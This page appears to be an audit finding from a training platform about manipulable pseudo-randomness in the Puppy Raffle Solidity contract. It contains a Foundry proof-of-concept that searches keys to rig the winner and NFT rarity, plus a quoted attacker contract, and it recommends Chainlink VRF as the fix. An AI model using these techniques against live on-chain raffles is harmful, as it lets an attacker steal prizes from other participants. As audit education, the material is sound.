Puppy Raffle

AI First Flight #1
Beginner FriendlyFoundrySolidityNFT
EXP
View results
Submission Details
Severity: high
Valid

Manipulable pseudo-randomness

Root + Impact

Description

  • Winner selection and rarity use predictable/manipulable chain inputs:

    //@> line 128
    uint256 winnerIndex =
    uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;
    address winner = players[winnerIndex];
    //@> line 139
    uint256 rarity = uint256(keccak256(abi.encodePacked(msg.sender, block.difficulty))) % 100;
  • The caller can vary msg.sender; block producers/builders can influence inclusion and timestamps within protocol limits, and have special visibility/control over block entropy. This can bias winner choice and, especially, puppy rarity.


Risk

Likelihood:

  • selectWinner is permissionless, so any account can supply the msg.sender value included in both randomness calculations.

  • A malicious caller can generate and fund many accounts offline, then select an account whose address produces a favorable winner index and/or rarity for the current block entropy.

  • Block producers can influence transaction inclusion and timestamp, and the block entropy (block.difficulty / prevrandao) is not a verifiable random source for a high-value raffle.

Impact:

  • An attacker can bias selection toward an attacker-controlled raffle entry, unfairly taking the 80% ETH prize and NFT.

  • An attacker can bias the NFT rarity toward legendary, reducing rarity scarcity and harming NFT holders.

Proof of Concept

This test searches attacker-controlled private keys until it finds one that:

  1. Selects playerOne (the attacker-controlled raffle entry) as the winner.

  2. Produces a legendary puppy rarity.

// SPDX-License-Identifier: MIT
pragma solidity ^0.7.6;
import {Test} from "forge-std/Test.sol";
import {PuppyRaffle} from "../src/PuppyRaffle.sol";
contract PuppyRaffleRandomnessTest is Test {
uint256 private constant ENTRANCE_FEE = 1 ether;
uint256 private constant RAFFLE_DURATION = 1 days;
PuppyRaffle private raffle;
// Assume playerOne is controlled by the attacker.
address private playerOne = address(0xA11CE);
address private playerTwo = address(0xB0B);
address private playerThree = address(0xCAFE);
address private playerFour = address(0xD00D);
function setUp() public {
raffle = new PuppyRaffle(
ENTRANCE_FEE,
address(0x99),
RAFFLE_DURATION
);
address[] memory entrants = new address[](4);
entrants[0] = playerOne;
entrants[1] = playerTwo;
entrants[2] = playerThree;
entrants[3] = playerFour;
raffle.enterRaffle{value: 4 ether}(entrants);
}
function test_AttackerCanChooseCallerToBiasWinnerAndRarity() public {
vm.warp(block.timestamp + RAFFLE_DURATION + 1);
vm.roll(block.number + 1);
uint256 chosenPrivateKey;
address chosenCaller;
// An attacker performs this inexpensive search off-chain.
for (uint256 privateKey = 1; privateKey < 10_000; privateKey++) {
address candidate = vm.addr(privateKey);
uint256 winnerRandomness = uint256(
keccak256(
abi.encodePacked(
candidate,
block.timestamp,
block.difficulty
)
)
);
uint256 rarityRandomness = uint256(
keccak256(
abi.encodePacked(candidate, block.difficulty)
)
);
bool attackerWins = winnerRandomness % 4 == 0;
bool legendaryPuppy = rarityRandomness % 100 > 95;
if (attackerWins && legendaryPuppy) {
chosenPrivateKey = privateKey;
chosenCaller = candidate;
break;
}
}
assertTrue(chosenPrivateKey != 0, "Suitable attacker account not found");
// The attacker owns `chosenPrivateKey` and calls selectWinner from it.
vm.deal(chosenCaller, 1 ether);
vm.prank(chosenCaller);
raffle.selectWinner();
assertEq(raffle.previousWinner(), playerOne);
assertEq(
raffle.tokenIdToRarity(0),
raffle.LEGENDARY_RARITY()
);
}
}

Recommended Mitigation

Use asynchronous verifiable randomness—not block.timestamp, block.difficulty, or msg.sender. The raffle must freeze entries and refunds while waiting for the random result, so the participant set cannot change between requesting and using randomness.

Below is an illustrative adapter pattern; in production, make randomnessProvider the official Chainlink VRF coordinator/consumer integration.

interface IRandomnessProvider {
// The provider records msg.sender as the callback recipient.
function requestRandomWord() external returns (uint256 requestId);
}
contract PuppyRaffle is ERC721, Ownable {
IRandomnessProvider public immutable randomnessProvider;
bool public drawingInProgress;
uint256 public pendingRequestId;
event WinnerRandomnessRequested(uint256 indexed requestId);
event WinnerSelected(address indexed winner, uint256 indexed tokenId);
constructor(
uint256 _entranceFee,
address _feeAddress,
uint256 _raffleDuration,
address _randomnessProvider
) ERC721("Puppy Raffle", "PR") {
require(_randomnessProvider != address(0), "Invalid randomness provider");
entranceFee = _entranceFee;
feeAddress = _feeAddress;
raffleDuration = _raffleDuration;
raffleStartTime = block.timestamp;
randomnessProvider = IRandomnessProvider(_randomnessProvider);
}

The key security properties are:

  • No user-controlled value contributes to the random output.

  • Only the trusted VRF coordinator can fulfill the pending request.

  • The participant set is immutable between the randomness request and winner selection.

  • The same VRF word, domain-separated with tokenId, supplies the rarity roll.

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 5 hours ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!